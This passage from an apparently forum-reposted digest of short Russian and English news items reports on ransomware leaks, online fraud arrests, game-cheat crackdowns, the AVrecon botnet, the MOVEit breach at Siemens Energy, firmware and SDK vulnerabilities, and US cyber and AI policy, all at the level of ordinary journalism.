В ответ на ситуацию компания также покроет расходы на 12-месячный мониторинг даркнета и услугу по утечке паролей для всех пострадавших лиц.
LockBit взяла на себя ответственность.
Банда вымогателей LockBit заявила, что скомпрометировала KAVX 26 мая 2023
года, когда добавила компанию на свой сайт утечки данных.
Злоумышленники опубликовали на своем портале вымогателей несколько образцов
украденных данных, включая сканы паспортов, финансовые документы, соглашения о
неразглашении и многое другое. Крайний срок, который хакеры установили для
KAVX для выплаты выкупа, — 9 июня 2023 года.
Примечательно, что LockBit также опубликовал схемы компонентов и технические чертежи, а это означает, что инцидент может привести к раскрытию патентованных разработок и запатентованной информации конкурентам.
Следователи следственного управления области вместе с работниками отдела противодействия киберпреступлениям в Запорожской области ГКП НПК Украины установили группу лиц, которые наладили мошенническую схему в интернете.
Двое ранее судимых мужчин и женщина размещали объявления об оптовой продаже строительных материалов по заниженным ценам. Чтобы еще больше привлечь покупателей, злоумышленники предлагали доставку и выгрузку товара манипулятором бесплатно. За такие услуги нужно было оплатить наперед. Псевдопродавцы имитировали деятельность целого предприятия - работу директора, администратора, бухгалтера, водителя и тому подобное. После получения денег мошенники исчезали, а заказчики не получали обещанного.
Полицейские установили, что с целью конспирации, члены группировки использовали банковские карточки третьих лиц (ранее осужденных или наркозависимых), не информируя их о своих преступных намерениях. Для поддержания связи, координации совместных действий, а также во избежание раскрытия своей противозаконной деятельности злоумышленники пользовались большим количеством телефонов с карточками различных мобильных операторов, которые регулярно меняли.
Таким образом, за период с июня 2022 до марта 2023 года фигуранты успели обмануть по меньшей мере 9 человек из разных областей страны.
Правоохранители провели обыски по местам проживания мошенников в Заводском районе областного центра. В результате обнаружено и изъято большое количество мобильных телефонов, сим-карт различных операторов связи, банковские карточки и черновые записи.
33-летнему организатору и двум его сообщникам сообщено о подозрении в совершении преступлений, предусмотренных ч. 4 ст. 190 (Мошенничество) Уголовного кодекса Украины. Двум фигурантам избраны меры пресечения в виде содержания под стражей, а их 37-летней сообщнице - круглосуточный домашний арест.
Досудебное расследование продолжается под процессуальным руководством Вознесеновской окружной прокуратуры.
Несостоявшееся 12 июля совещание по обеспечению государственных интересов в сети Интернет во главе с Антоном Эдуардовичем Вайно было перенесено на 10 августа, сообщают источники. Предлагавшаяся первым замглавы администрации президента России Сергеем Кириенко, назначенная на дату - 26 июля была отклонена.
Список рассматриваемых тем:
С начала недели от действий дистанционных мошенников пострадали жители Великого Новгорода, Чудовского и Боровичского районов. В общей сложности потерпевшие перевели на неизвестные счета мошенников более 1 миллиона 800 тысяч рублей.
Так, 25 августа в межмуниципальный отдел МВД России «Боровичский» обратился местный житель. Он пояснил, что в начале июня нынешнего года в интернете увидел рекламу о возможности получения дополнительного заработка на бирже криптовалют. Боровичанин зарегистрировался на сайте, и вскоре с ним связался «консультант» виртуальной торговой площадки, который предложил свою помощь в проведении финансовых операций. Следуя инструкциям мошенника, потерпевший почти три месяца переводил на указанные злоумышленником счета различные суммы от 96 до 380 тысяч рублей.
Когда заявитель решил перевести виртуальные деньги в настоящие, посредник убедил его, что нужно предварительно оплатить налоговые выплаты и страховку. После того, как житель Боровичей для этого внёс еще 260 тысяч рублей, злоумышленник перестал выходить на связь. В общей сложности потерпевший перевел мошенникам около 1,2 миллиона рублей.
Решение последовало за серией масштабных кибератак на частные компании и сети федерального правительства.
Президент США Джо Байден в среду, 12 мая, подписал указ , направленный на усиление кибербезопасности США. Данное решение последовало за серией масштабных кибератак на частные компании и сети федерального правительства за последний год.
Взлом крупнейшей в США топливной компании Colonial Pipeline — лишь последний пример того, как преступные группировки или государственные деятели используют уязвимости в сетях США. В прошлом году была совершена кибератака на цепочку поставок SolarWinds, что позволило хакерам получить доступ к коммуникациям и данным в нескольких государственных учреждениях.
Указ президента призывает федеральное правительство и частный сектор к сотрудничеству для противодействия «постоянным и все более изощренным вредоносным кампаниям», угрожающим безопасности США.
Указ Байдена предусматривает ряд шагов, направленных на модернизацию кибербезопасности страны. От поставщиков IT-услуг требуется сообщать правительству о взломах, которые могут повлиять на сети США. Предлагается создать стандартизированное руководство и набор определений для федеральных мер реагирования на киберинциденты. Указ призывает повысить безопасность программного обеспечения, продаваемого правительству, в том числе заставляя разработчиков публиковать определенные данные о безопасности.
Документ учреждает «Совет по анализу безопасности кибербезопасности», состоящий из должностных лиц государственного и частного секторов, который может собираться после кибератак для анализа ситуации и выработки рекомендаций.
С марта 2021 года Tufi мешал многим профессиональным игрокам, использовал читы и совершал DDoS-атаки на серверы игры.
Профессиональные игроки Apex Legends и создатели контента по видеоигре
постоянно подвергались преследованиям и оскорблениям со стороны геймера,
использующего псевдоним Tufi, но похоже, что хакер наконец-то получит по
заслугам.
С марта 2021 года Tufi портил опыт рейтинговых игр для многих профессиональных
игроков и создателей контента, использовал читы и совершал DDoS-атаки на
серверы игры.
В новом рейтинговом сезоне Tufi практически не появлялся, и киберспортсмен Таннер «Rogue» Требб (Tanner Trebb) прояснил отсутствие хакера.
«Он в тюрьме. Этот человек сейчас проходит судебный процесс, я пытался его предупредить, пытался рассказать всем, но да, он завален судебными издержками», — сообщил Требб.
Судя по всему, разработчики из Respawn Entertainment действительно выследили Tufi, установили личность преступника и теперь преследуют его через суд.
Китайская полиция в сотрудничестве с технологическим гигантом Tencent арестовала 10 разработчиков 17 разных инструментов для читерства в играх (включая Overwatch и Call of Duty Mobile). Правоохранители и Tencent называют это крупнейшей в истории операцией, направленной против читеров.
По информации BBC, суммарно у подозреваемых изъяли 76 000 000 долларов которые те заработали на абонентской плате, продавая подписки на свои читы. Такая подписка могла стоить от 10 долларов в день, до 200 долларов в месяц.
Также полиция арестовала имущество разработчиков на сумму 46 000 000 долларов и изъяла несколько автомобилей премиум-класса (Rolls-Royce, Ferrari, Lamborghini), которые можно увидеть на фото ниже.


Стоит сказать, что борьба с читерами и создателями подобного ПО выходит на новый уровень. Дело в том, что в мире действует множество аналогичных команд размотчиков, которые пока не попали в поле зрения правоохранителей, но нередко становятся целью для производителей видеоигр и фигурантами различных судебных исков, порой связанных с нарушениями закона об авторском праве.
К примеру, только на прошлой неделе издание TorrentFreak сообщало, что в начале года Riot Games и Bungie подали иск против производителей читов GatorCheats, утверждая, что те создавали нарушающие авторские права инструменты, предназначенные для порчи игровой среды в играх Valorant и Destiny 2. Согласно судебным документам, в итоге стороны согласились урегулировать дело миром, но при этом GatorCheats обязали выплатить 2 000 000 долларов и бессрочно соблюдать условия полученного компаниями судебного запрета.
Источник: xakep.ru/2021/04/06/chicken-drumstick/
• Администрация Байдена разрабатывает меморандум о сохранении и расширении возможностей США в области ИИ.
• Меморандум не будет включать "Манхэттенский проект" для ИИ, но предложит платформу для государственно-частного партнерства.
• Основная цель - продвижение инноваций и предотвращение угроз общественной безопасности.
Стратегия и партнерство
• Меморандум будет ориентирован на оборонные и разведывательные ведомства с
поддержкой Института безопасности ИИ и Национального института стандартов и
технологий.
• Пентагон, разведка и коммерция будут сотрудничать с пятью частными компаниями в области ИИ.
Ответственное использование ИИ
• Меморандум обеспечит основу для ответственного использования ИИ и ускорения
его внедрения в государственном и частном секторах.
Международное сотрудничество и регулирование
• Белый дом стремится связать федеральный надзор за ИИ с международными
стандартами.
• Европейский союз и Великобритания уже приняли законодательство по ИИ, Китай также участвует в международных инициативах.
Риски и контрмеры
• Обсуждаются потенциальные риски и контрмеры, связанные с искусственным
интеллектом, включая оценку угрозы и разработку контрмер с использованием ИИ.
Сравнение с Манхэттенским проектом
• Обсуждается аналогия с Манхэттенским проектом, подчеркивая важность
преимущества первопроходца в области технологии.
Сложности внедрения ИИ
• Отмечается, что в отличие от 1940-х годов, финансирование и технологии ИИ
находятся в частных руках, и правительство не всегда может их контролировать.
Проект Rand и геополитика AGI
• Rand исследует неопределенности в отношении AGI и его потенциального влияния
на стратегическое преимущество.
Разделение мнений в технологическом сообществе
• Существует разделение мнений между "думающими" о конце человечества и
"акселерационистами", которые видят в ИИ способ улучшения жизни.
Роль президента Байдена
• Команда Байдена разрабатывает правила для цифровых технологий, которые могут
изменить мир к лучшему или к худшему.
Крупнейший американский майнер начал маркировать биткоины «Сделано в США»
В августе 2024 года компания Marathon Digital, лидер в области майнинга биткоинов в США, представила инициативу по маркировке всех добытых в США биткоинов меткой "Made in USA". Эта инициатива отражает как экономические, так и политические устремления компании, подчеркнувшие важность национального контроля над цифровыми активами. Маркировка обеспечивается через добавление уникальных метаданных в каждый блок, добытый пулом MARA, что идентифицирует блоки как произведенные в США.
Политический подтекст инициативы усиливается на фоне заявлений бывшего президента Дональда Трампа, который поддержал идею увеличения доли американского производства в криптовалютной сфере. Этот шаг также направлен на укрепление позиций США в глобальной экономике и повышение доверия инвесторов. Метка "Made in USA" становится символом экономического патриотизма и поддержки национальной безопасности.
С технической точки зрения, метка "Made in USA" добавляется только в метаданные блока и не обеспечивает отслеживание конкретных биткоинов после их выхода на рынок. Маркированные биткоины неотличимы от других после того, как покидают майнинговый пул, и в блокчейне не существует механизма для дальнейшего контроля за их перемещениями. Это значит, что хотя место добычи и фиксируется, сам биткоин после этого становится неотличимым от других на рынке
Источники: [Cointelegraph](https://cointelegraph.com/news/marathon-digital- made-in-usa-bitcoin-blocks) [TitoVlogs](https://titovlogs.tv/blogs/news/marathon-digital-now-stamps-all- bitcoin-mined-in-america-as-made-in-usa) CoinMarketCap
Австрийские правоохранительные органы сообщили об аресте 20 человек, связанных с нелегальной сетью IPTV, функционирующей с 2016 года. За семь лет существования данная сеть занималась дешифровкой и перераспределением защищённых авторским правом телевизионных трансляций среди тысяч клиентов.
Расследование преступной деятельности началось после жалобы, поданной в Германии. В ходе следствия была выявлена организованная группа из 80 человек, все граждане Турции.
Структура пиратской сети была иерархической: поставщики дешифровали телевизионные сигналы, а реселлеры покупали доступ и перепродавали его конечным потребителям по цене до 200 долларов в год.
Хотя пиратская сеть кратковременно рекламировалась через Facebook, основным каналом привлечения клиентов стало «сарафанное радио», а некоторые клиенты превращались в реселлеров, способствуя пирамидальному расширению сети.
По информации австрийской полиции, были определены 15 реселлеров и 3
поставщика. Каждый реселлер обслуживал от 300 до 2500 клиентов, предоставляя
им доступ к нелегальным трансляциям за годовую подписку.
Аресты прошли в различных регионах Австрии, включая Вену, Нижнюю Австрию,
Зальцбург, Форарльберг и Тироль. В ходе операции были изъяты:
1,6 миллиона евро (1,74 миллиона долларов или 157 миллионов рублей) с 60 банковских счетов;
35 серверов, использовавшихся для дешифровки сигналов и распределения IPTV-каналов;
автомобиль Audi A7;
55 компьютерных систем, жёстких дисков и смартфонов.
«Основные участники преступной сети владели роскошным недвижимым имуществом, спортивными автомобилями и рядом компаний, клубов и частных обществ» — говорится в заявлении австрийской полиции.
Часть незаконно полученных средств вкладывалась в законные инвестиции, тем самым интегрируя преступников в более высокие экономические круги.
Задержанные признались в совершении коммерческого мошенничества, отмывании денег, нарушении закона о контроле доступа и нарушении положений Закона об авторском праве.
Другие члены преступной группы в настоящее время находятся в Германии, где и располагается центр их незаконной деятельности, однако местные власти пока не начали судебные разбирательства, значит высока вероятность, что виновные сумеют избежать наказания, спрятавшись, например, в другой стране.
Этот случай наглядно демонстрирует, что использование нелегальных сервисов в итоге может обернуться проблемами, причём как для организаторов, так и для потребителей.
Хотя стоимость подписки подобных сервисов может казаться выгодной, её оплата на самом деле является косвенной поддержкой незаконной деятельности. Не говоря уже о том, что доступа можно лишиться в любой момент, а деньги за оплаченные наперёд услуги уже никто не вернёт.
source: bundeskriminalamt.at/news.aspx?id=766E495644386B38346E493D
Согласно данным [Lumen Black Lotus Labs](https://blog.lumen.com/routers-from- the-underground-exposing-avrecon/?utm_source), с мая 2021 года Linux-вреднос AVrecon заразил более 70 000 SOHO-роутеров и сделал большинство из них частью ботнета, который специализируется на создании скрытых резидентных прокси.
Такие прокси позволяют операторам ботнета маскировать широкий спектр вредоносных действий, от мошенничества с цифровой рекламой до атак типа password spraying.
По данным исследователей, несмотря на то, что троян удаленного доступа AVrecon (RAT) скомпрометировал более 70 000 устройств, только 40 000 из них стали частью ботнета, когда малварь закрепилась на устройстве.
AVrecon удавалось долгое время практически полностью избегать обнаружения, хотя впервые его заметили еще в мае 2021 года, когда вредонос был нацелен на маршрутизаторы Netgear. С тех пор ботнет оставался незамеченным на протяжении двух лет и постепенно рос, к настоящему моменту став одним из крупнейших в мире ботнетов, ориентированных на маршрутизаторы.
«Мы подозреваем, что злоумышленники сосредоточились на SOHO-устройствах, так как в них с меньшей вероятностью будут исправлены различные CVE, — говорят в специалисты. — Вместо того чтобы использовать ботнет для быстрого получения прибыли, его операторы придерживались более умеренного подхода и смогли оставаться незамеченными на протяжении двух лет. Благодаря скрытному характеру вредоносной программы, владельцы зараженных машин редко замечают проблемы в работе или потерю пропускной способности».
Click to expand...
После заражения малварь передает информацию о взломанном маршрутизаторе на
встроенный адрес управляющего сервера. После установления контакта взломанному
устройству дается указание установить связь с другой группой серверов —
управляющими серверами второго этапа. Исследователи обнаружили 15 таких
серверов, которые, судя по информации о сертификатах x.509, работают как
минимум с октября 2021 года.

Эксперты отмечают, что им удалось навредить работе AVrecon, обнулив маршрутизацию для управляющего сервера ботнета в своей магистральной сети. Фактически это разорвало соединение между ботнетом и его управляющей инфраструктурой, что значительно ограничило малварь в выполнении вредоносных действий.
«Использование шифрования не позволяет нам комментировать результаты атак password spraying, однако мы блокировали C&C-серверы и препятствовали прохождению трафика через прокси-серверы, что сделало ботнет неактивным в магистральной сети Lumen», — пишут в компании.
Click to expand...
Siemens Energy has confirmed that data was stolen during the recent Clop ransomware data-theft attacks using a zero-day vulnerability in the MOVEit Transfer platform.
Siemens Energy is a Munich-based energy technology company with a global presence, employing 91,000 people and having an annual revenue of $35 billion.
It designs, develops, and manufactures a wide range of industrial products, including industrial control systems (ICS), state-of-the-art power, heat generation units, renewable energy systems, on and off-site energy delivery systems, and flexible power transmission solutions.
The company also provides a wide range of cybersecurity consulting services for the oil and gas industry, including incident response plans, vulnerability assessment, and patch management.
Siemens Energy confirms breach
Today, Clop listed Siemens Energy on their data leak site, indicating that
data was stolen during a breach on the company.
As part of Clop's extortion strategy, they first begin listing a company's name on their data leak site to apply pressure, followed by the eventual leaking of data.
While no data has been leaked at this time, a Siemens Energy spokesperson confirmed that they were breached in the recent Clop data-theft attacks utilizing a MOVEit Transfer zero-day vulnerability tracked as CVE-2023-34362.
However, Siemens Energy says that no critical data was stolen, and business operations were not impacted.
"Regarding the global data security incident, Siemens Energy is among the targets," confirmed Siemens Energy to bleepingcomputer[.]
"Based on the current analysis no critical data has been compromised and our operations have not been affected. We took immediate action when we learned about the incident."
Source - BleepingComputers
Злоумышленник может получить доступ к системным ресурсам в любое время, даже
когда система выключена.
Исследователи кибербезопасности из Binarly Research обнаружили множество
уязвимостей высокой степени опасности в чипсете Qualcomm Snapdragon.
Недостатки были обнаружены в прошивке UEFI и затрагивают ноутбуки и устройства
на базе ARM, использующие чипы Qualcomm Snapdragon. Qualcomm раскрыла
уязвимости 5 января и выпустила для них исправления .
Ошибки затронули также BIOS ноутбука Lenovo ThinkPad X13s. Компания выпустила
обновление BIOS для устранения недостатков . Однако, 2 уязвимости до сих пор
не устранены.
По словам основателя и генерального директора Binarly Алексея Матросова, с
помощью этих ошибок злоумышленник может получить контроль над системой,
изменив переменную в энергонезависимой памяти, в которой данные хранятся
постоянно, даже когда система выключена.
Измененная переменная скомпрометирует фазу безопасной загрузки системы, и
киберпреступник сможет получить постоянный доступ к системе после того, как
эксплойт будет установлен. Другими словами, злоумышленник может выполнить
вредоносный код или получить доступ к системным ресурсам в любое время, даже
когда система выключена.
По данным Binarly, Windows Dev Kit 2023 от Microsoft (Project Volterra) также
подвержен уязвимости. Project Volterra предназначен для разработчиков, которые
пишут и тестируют код для Windows 11.
Обнаружение уязвимостей в загрузочном слое ARM вызывает особую тревогу,
поскольку архитектура управляет мобильной экосистемой с низким
энергопотреблением, которая включает смартфоны 5G и базовые станции. Базовые
станции все чаще становятся центром коммуникаций для пограничных устройств и
облачных инфраструктур. Злоумышленники могут вести себя как операторы, и у них
будет постоянный доступ к системам на базовых станциях, и никто об этом не
узнает.
Мошенники использовали вредоносное ПО для PoS-терминалов и украли 167 тысяч платежных записей на сумму более $3 млн.
Согласно новому отчету ИБ-компании Group-IB, мошенники использовали вредоносное ПО для PoS-терминалов и украли 167 тысяч платежных записей на сумму более $3 млн., при этом большинство кредитных карт (160 тысяч) были выпущены в США. Злоумышленники собрали записи о платежах с 212 зараженных PoS- устройств в США.
Исследователи Group-IB обнаружили плохо защищенный сервер управления и контроля (C&C), используемый для вредоносного ПО MajikPOS. Дальнейший анализ показал, что этот же сервер также использовался в качестве административной панели C&C-сервера для другого вредоносного ПО – Treasure Hunter.
Обе панели содержат информацию об украденных дампах и зараженных PoS- устройствах. В ходе расследования специалисты Group-IB проанализировали около 77 400 уникальных дампов карт с панели MajikPOS и около 90 000 с панели Treasure Hunter. 97% всех сведений о платежах, собранных с помощью MajikPOS и Treasure Hunter, поступили из США.
Исследователи извлекли данные и обнаружили, что с февраля 2021 года киберпреступники украли 167 тысяч платежных записей, составляющих 160 000 кредитных карт, выпущенных в США. По оценкам исследователей, злоумышленники могли продать скомпрометированные карты за $3,3 млн. на подпольных форумах.
В более 20 штатах есть одно или несколько скомпрометированных PoS-терминалов. Больше всего зараженных PoS-устройств находится в:
Техасе (17);
Миссури (14);
Иллинойсе (14);
Флориде (13).
Ранее аналитики Лаборатории Касперского обнаружили 3 новых версии вредоносного ПО Prilex, нацеленного на PoS-терминалы . Последний выпуск ПО способен генерировать криптограммы EMV (Europay, MasterCard и Visa) – систему проверки транзакций, которая помогает обнаруживать и блокировать мошенничество с платежами.
source: blog.group-ib.com/majikpos_treasurehunter_malware
Трейдер Citigroup, работавший удаленно, ошибся в одной цифре при совершении сделки, спровоцировав обвал на биржах.
Сотрудник банка, работавший удаленно, ошибся в одной цифре при совершении сделки. На биржах произошел обвал, а убытки Citigroup составили более $50 млн. Об этом сообщает Bloomberg.
Предварительное расследование Citigroup показало, что 2 мая трейдер на удаленке работал в выходной из дома, случайно нажал еще раз ноль на клавиатуре, вводя сумму сделки. Система безопасности ошибку не заметила и сделку пропустила. В результате, компания потеряла $50 млн.
Ошибка привела к череде сделок со стороны других трейдеров, а также внезапному падению капитализации рынка европейских акций на $315 млрд. В Citigroup назвали этот инцидент «сделка Fat-Finger».
Трейдера с «толстым пальцем» отправили в отпуск до окончания расследования, а компания и регулирующие органы до сих пор изучают инцидент и подсчитывают убытки. Пока выводы таковы, что удаленный режим работы сотрудника никак не связан с ошибкой, сработал обычный человеческий фактор.
Компания пообещала проверить работу внутренней системы безопасности, которая не должна была разрешить трейдеру сделать такую ошибку.
Специалист отметил, что особой опасности в ней нет
Председатель совета Фонда развития цифровой экономики Герман Клименко заявил, что группировка компьютерных взломщиков Anonymous представляет собой общественную организацию, в которую не входят профессиональные хакеры, передает телеканал [«360»](https://360tv.ru/news/tehnologii/piarnaja-ochen- krasivaja-istorija-v-dejatelnosti-hakerov-gruppy-anonymous-ne-uvideli-osoboj- opasnosti/).
«Anonymous – это, скорее всего, общественная организация. Это такая инициативная история, ей уже лет 20. Она зародилась на волне протестов против чего-то. Есть название, и под ней подписываются разные люди. С точки зрения журналистики это пиарная, очень красивая история», – сказал он.
Клименко также отметил, что многие хакеры, которые хотя стать профессионалами в этой области, часто начинают свою деятельность в таких движениях, организуют слабые DDoS-атаки. Однако какого-то конкретного заказчика у них в основном нет.
По его же словам, российским сайтам также постоянно приходится отбиваться от профессиональных хакеров.
«Мы должны каждый день обновлять свое программное обеспечение. Мы каждый день строим свою защиту и каждый день отбиваемся. Кибервойна идет постоянно», – указал IT-эксперт.
Отметим, что ранее группировка компьютерных взломщиков Anonymous объявила кибервойну России.
Хакеры используют утекшие данные OT в кибератаках на промышленные предприятия
Примерно 1,3 тыс. атак в 2021 году затронули критически важную инфраструктуру и промышленные организации.
Многие атаки вымогательских группировок на организации промышленной и критической инфраструктуры приводят к раскрытию данных операционных технологий (OT). По словам специалистов из компании Mandiant, подобные данные могут быть полезны злоумышленникам, в том числе для проведения кибератак на промышленные предприятия.
Исследователи проанализировали примерно 2,6 тыс. утечек данных, произошедших в результате атак вымогателей в 2021 году. По оценкам экспертов, примерно 1,3 тыс. атак затронули критически важную инфраструктуру и промышленные организации.
10 из 70 утечек содержали конфиденциальную информацию OT, включая учетные данные IT- и OT-администраторов, файлы проектов ПЛК, документацию по процессам, инженерную документацию для проектов клиентов, а также исходный код и другую информацию для проприетарной платформы.
Среди атакованных организаций были производители возобновляемой и гидроэлектроэнергии, производитель поездов, нефтегазовые организации, интеграторы систем управления и служба спутникового слежения за транспортными средствами.
«Доступ к данным такого типа может позволить злоумышленникам узнать о промышленной среде, определить пути наименьшего сопротивления и спланировать кибератаки. Даже если данные OT относительно старые, типичный срок службы IT- систем составляет от двадцати до тридцати лет, в результате чего утечки актуальны в целях разведки на десятилетия — намного дольше, чем утекшая информация об IT-инфраструктуре», — пояснили специалисты.
Нацполиция Харьковской области заявляет, что раскрыла 20-летнего юношу, который выманивал у мужчин деньги, общаясь на сайтах знакомств от имени молодых женщин. Об этом сообщает пресс-служба областной Нацполиции, сообщает "ЛІГА.net".
"Установлено, что 20-летний юноша размещал объявления на сайтах знакомств и общался от имени девушки", – заявляют в полиции.
В ходе переписки он якобы предлагал жертвам вместе посетить какое-нибудь культурное мероприятие (киносеанс, концерт, выставку) и высылал ссылку на фишинговый сайт по продаже онлайн-билетов.
Во время покупки потерпевшие заполняли форму с указанием реквизитов своих банковских карт, "таким образом мошенник получал доступ к персональным данным и частной информации о банковских картах потерпевших и при помощи разных платежных систем перечислял средства на подконтрольные ему счета", отмечают правоохранители.
Обыски по месту жительства 20-летнего подозреваемого полицейские провели с привлечением бойцов спецназа. Изъяли компьютер, мобильные телефоны и банковские карты. Открыто дело по статье о мошенничестве, ему грозит до восьми лет тюрьмы.
В Швеции предполагают, что российские хакеры атаковали шведскую коммуну Каликс, взломав ее систему данных. И хотя точно определить виновных невозможно, подозрения направлены именно в адрес на россиян.
Об этом сообщают в шведской телекомпании Sveriges Television (SVT).
Кибератака на Швецию происходила одновременно с нескольких серверов, расположенных в разных странах мира. Ее целью было получение выкупа в обмен на нормализацию работы системы. Несмотря на это, в причастности к взлому, который вывел из строя систему данных Каликс, подозревают «руку Москвы».
Начальник штаба IT-деятельности коммуны Кеннет Бьёрнфут в беседе с журналистами радиостанции P4 Norbotten заявил, что ему известно, откуда произошло нападение. Он утверждает, что в нем виновен «кто-то из России». Типичный вариант хайли-лайкли...
При этом, как отмечает СМИ Швеции, представитель коммуны заявил, что в своих догадках он опирался на мнение главнокомандующего Вооруженными силами Швеции, усматривающего в любых неприятностях злой умысел россиян.
Но при этом он отметил, что, даже зная откуда была организована атака, невозможно с полной уверенностью определить страну-организатора...
На данный момент дело о кибератаке расследуют шведские полицейские.
Примечательно, что в любом компьютерном взломе на Западе принято подозревать россиян или китайцев. Как будто в других странах, включая саму Швецию, нет хакеров.
The Internal Revenue Service (IRS) has secured an order to obtain records from
Kraken on customers performing cryptocurrency trades.
In the latest crackdown centered on cryptocurrency trading which is not
reported for tax and income purposes, the IRS has been granted permission by a
federal court in the Northern District of California to issue a "John Doe"
summons on Payward Ventures Inc. and Kraken, its US-facing arm.
The US Department of Justice (DoJ) said this week that the IRS is seeking information on US taxpayers who have conducted at least $20,000 -- or the equivalent -- in cryptocurrency trades on the platform between 2016 and 2020.
It is important to note, however, that the summons does not imply wrongdoing on the San Francisco-based cryptocurrency exchange's part.
The summon seeks records on US taxpayers from Kraken, counted among its customers, who may have not complied with internal revenue laws and tax requirements -- such as trading in cryptocurrency but failing to record taxable profits.
A John Doe order is issued in circumstances when individuals have not been identified.
According to IRS guidance (.PDF), "convertible" cryptocurrency -- able to be exchanged for fiat currency, such as Bitcoin (BTC) -- may have tax liabilities in the United States. Virtual currency taxes have to be determined based on "fair market values" at the time of trading or purchase. Mining, too, might be taxable.
Court documents state that the information request "is part of an ongoing, extensive investigation involving substantial IRS resources that is producing real results -- millions of dollars in previously unreported and unpaid taxes recovered for the treasury to date."
"There is no excuse for taxpayers continuing to fail to report the income earned and taxes due from virtual currency transactions," commented IRS Commissioner Chuck Rettig. "This John Doe summons is part of our effort to uncover those who are trying to skirt reporting and avoid paying their fair share."
A similar summons was previously issued to Circle, a blockchain-based payments platform headquartered in Boston.
Coinbase, too, is also subject to scrutiny by the IRS and law enforcement agencies as a popular cryptocurrency exchange. In the firm's latest [transparency report](https://blog.coinbase.com/coinbase-transparency- report-h2-2020-b8ef1632c4dc), Coinbase revealed 4,227 requests in 2020, with 90% made from the US, UK, and Germany.
In total, under 5% were civil or administrative requests, whereas the rest stemmed from criminal investigations.
Еще в прошлом году эксперты компании McAfee обнаружили опасный баг в SDK Agora, который используется для реализации аудио- и видеозвонков. Уязвимость, получившая идентификатор CVE-2020-2560, позволяла незаметно подключаться к чужим аудио- и видеозвонкам.

Схема атаки
Исследователи предупреждают, что Agora используют такие приложения, как
MeetMe, Skout, Nimo TV, temi, Dr. First Backline, Hike, Bunch и Talkspace.Они
имеют десятки миллионов загрузок только по официальной статистике Google Play
Store.
Обнаруженная проблема заключается в том, что Agora SDK не шифрует данные, передаваемые в процессе совершения нового вызова, даже если в приложении включена функция шифрования. Из-за этого любой желающий, находящийся в той же сети, что и жертва, может перехватить трафик на начальных этапах вызова, извлечь из него различные ID, а затем тайно присоединиться к звонку. Эксперты подчеркивают, что они пока не наблюдали подобные атаки на практике.

Отчет McAfee гласит, что разработчики Agora SDK исправили баг еще в конце 2020 года и призвали всех обновиться. Однако специалистам неизвестно, в каких именно приложениях уже применяется новая, лишенная опасной проблемы версия SDK.
«В мире онлайн-знакомств нарушение безопасности или возможность прослушивать звонки могут закончиться шантажом или преследованием со стороны злоумышленника. Но другие приложения с меньшей клиентской базой, где разработчики тоже применяют Agora, такие как робот temi, используются в других сферах, включая больницы, где возможность шпионить за разговорами уже может привести к утечке конфиденциальной медицинской информации», — предупреждают аналитики.
Click to expand...
Источник: xakep.ru/2021/02/18/agora-sdk/
Бывшему консультанту по кибербезопасности Винсенту Каннади грозит до 20 лет тюрьмы после обвинения в вымогательстве $1,5 млн. у международной IT-компании.
57-летний Каннади был арестован в начале мая в Эльдорадо-Спрингс, штат Миссури, после продолжительных попыток добиться «урегулирования» претензий по поводу увольнения из ИТ-компании в июне 2023 года.
С мая 2022 по июнь 2023 года Каннади работал в неуказанной компании со штаб- квартирой в Нью-Йорке, где его основные обязанности заключались в выявлении уязвимостей безопасности, способных привести к утечке корпоративных данных. Такая роль предоставила Каннади доступ к ИТ-инфраструктуре и хранимым данным компании.
После увольнения за низкую производительность труда Каннади предложили 2-ухнедельный выходной оклад в качестве компенсации и потребовали вернуть все устройства и данные компании. Однако через 3 дня после увольнения бывший сотрудник использовал рабочий ноутбук для доступа и скачивания конфиденциальной информации, включая интеллектуальную собственность, в своё личное облачное хранилище.
Каннади начал свои попытки получить компенсацию, заявляя о дискриминации в свою сторону и утверждая, что не сможет общаться с бывшим работодателем по крайней мере месяц из-за проблем со здоровьем. Каннади предложил уладить вопрос в обмен на сумму, эквивалентную 5-летнему окладу, иначе, по его словам, «пусть решают суды».
Через 2 недели Каннади увеличил ставки, потребовав дополнительно 10-летний оклад от компании по закону о намеренном нанесении эмоционального вреда. В другом письме, копии которого были отправлены журналистам, он угрожал судебными исками и публикацией украденных данных, если его требования не будут удовлетворены.
Компания в ответ подала иск о сдерживании Каннади, чтобы предотвратить разглашение файлов. В судебных документах указывается, что Нью-Йоркская компания Kyndryl подала такой иск 1 сентября 2023 года. Компания заявила, что хочет получить гарантии того, что украденные данные будут удалены, и запросила медицинскую справку с объяснением проблемы со здоровьем.
В итоге Каннади был арестован и обвинен в вымогательстве по закону Хоббса, предусматривающему максимальное наказание в виде 20 лет заключения. Подчеркивается, что все обвинения в отношении Каннади являются предварительными, и его вина должна быть доказана в судебном порядке.
sc:
justice[.]gov/usao-sdny/media/1350231/dl
justice[.]gov/usao-sdny/pr/former-cybersecurity-consultant-
arrested-15-million-extortion-scheme-against-it
translated.turbopages.org/proxy_u/en-
ru.ru.dd28e20a-6639e1de-67e638ee-74722d776562/https/en.wikipedia.org/wiki/Hobbs_Act
Следователем Главного следственного управления ГУ МВД России по городу Санкт- Петербургу и Ленинградской области завершено предварительное расследование уголовного дела о крупном мошенничестве. Перед судом предстанут двое мужчин, временно проживавших в Северной столице.
«По версии следствия, организатор криминальной структуры находил сообщников, которые размещали в Интернете объявления о продаже строительных материалов. Клиентов привлекали низкой ценой и обещаниями о коротких сроках доставки. Однако требовалось внести предоплату. Для убедительности злоумышленники отправляли изображения якобы оформленных платежных документов. Если потерпевшие соглашались и переводили деньги по указанным реквизитам, с ними переставали выходить на связь, а товар не доставлялся. Однако была и такая клиентка, которая отказалась оплачивать покупку до получения стройматериалов. Тогда аферисты заказали их у реального поставщика с оплатой при выгрузке. Когда заказ был доставлен, они направили покупательнице реквизиты, на которые необходимо перевести деньги. После разгрузки доставщики сообщили заказчице, что товар не оплачен. Однако в этот момент связаться со злоумышленниками уже не представлялось возможным.
Потерпевшими признаны 108 человек из 35 регионов России и шесть юридических лиц. Общий ущерб превысил 11 миллионов рублей», - рассказала официальный представитель МВД России Ирина Волк.
В результате оперативно-розыскных мероприятий сотрудники управления уголовного розыска ГУ МВД России по городу Санкт-Петербургу и Ленинградской области в декабре 2021 года задержали двоих подозреваемых. В ходе обысков по местам их проживания обнаружены и изъяты мобильный телефон, сим-карта и банковские карты.
Устанавливаются личности остальных участников группы. Уголовное дело в отношении них выделено в отдельное производство. Расследование продолжается.
«В качестве обеспечительной меры для последующего возмещения ущерба потерпевшим на имущество и денежные средства фигурантов наложен арест.
